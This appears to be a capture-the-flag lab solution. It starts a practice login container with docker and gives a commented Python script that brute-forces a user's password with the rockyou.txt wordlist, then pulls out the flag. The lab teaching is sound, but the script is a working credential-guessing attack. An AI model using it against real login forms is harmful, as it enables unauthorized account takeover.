docker run -d -p 9898:80 --restart always --name brute-login joshbeck2024/brute_login_ctf
Use something like Python requests to brute-force the password field.
rockyou.txt is a snap with the Python Requests Library. This is a good script to capture if you aren’t familiar.# Import the requests library so we can send HTTP requests (like a browser)
import requests
# Import sys so we can safely exit the program when needed
import sys
# =====================
# Configuration section
# =====================
# URL of the target website we are attacking
URL = "<http://sem2ctf.icsi.cyber:9898/>"
# Username we are trying to log in as
USERNAME = "mary"
# File that contains a list of possible passwords (one per line)
WORDLIST_FILE = "rockyou.txt"
def solve():
"""
This function attempts to brute-force a login form by trying
many passwords from a wordlist until one works.
"""
# Print basic info so the user knows what is happening
print(f"[*] Attacking {URL} with user '{USERNAME}'...")
print(f"[*] Using wordlist: {WORDLIST_FILE}")
try:
# Open the wordlist file for reading
# errors="ignore" skips lines with bad characters instead of crashing
with open(WORDLIST_FILE, "r", errors="ignore") as f:
# Loop through each line (password) in the wordlist
for password in f:
# Remove spaces and newline characters from the password
password = password.strip()
# Skip empty lines
if not password:
continue
# Show which password we are currently trying
print(f"[*] Trying password: {password}")
# Send an HTTP POST request to the target URL
# This mimics submitting a login form
response = requests.post(
URL,
data={
"email": USERNAME, # form field for username/email
"pass": password # form field for password
},
timeout=5 # stop waiting if the server takes too long
)
# Check the server response for the success indicator
if "Flag-" in response.text:
print(f"[+] Success! Password found: {password}")
# Find where the flag starts in the response
start_index = response.text.find("Flag-")
# Find the next HTML tag after the flag
end_index = response.text.find("<", start_index)
# If no tag was found, grab until the end of the response
if end_index == -1:
end_index = len(response.text)
# Extract just the flag text
flag = response.text[start_index:end_index].strip()
print(f"[+] Flag: {flag}")
# Stop the function once we succeed
return
else:
# Password was incorrect
print("[-] Incorrect.")
except FileNotFoundError:
# This runs if the wordlist file does not exist
print(f"[!] Wordlist not found: {WORDLIST_FILE}")
sys.exit(1)
except KeyboardInterrupt:
# This runs if the user presses CTRL+C
print("\\n[!] Interrupted by user.")
sys.exit(1)
# This message prints if no password worked
print("[-] Password not found in wordlist.")
# This ensures the script only runs when executed directly,
# not when imported into another Python file
if __name__ == "__main__":
solve()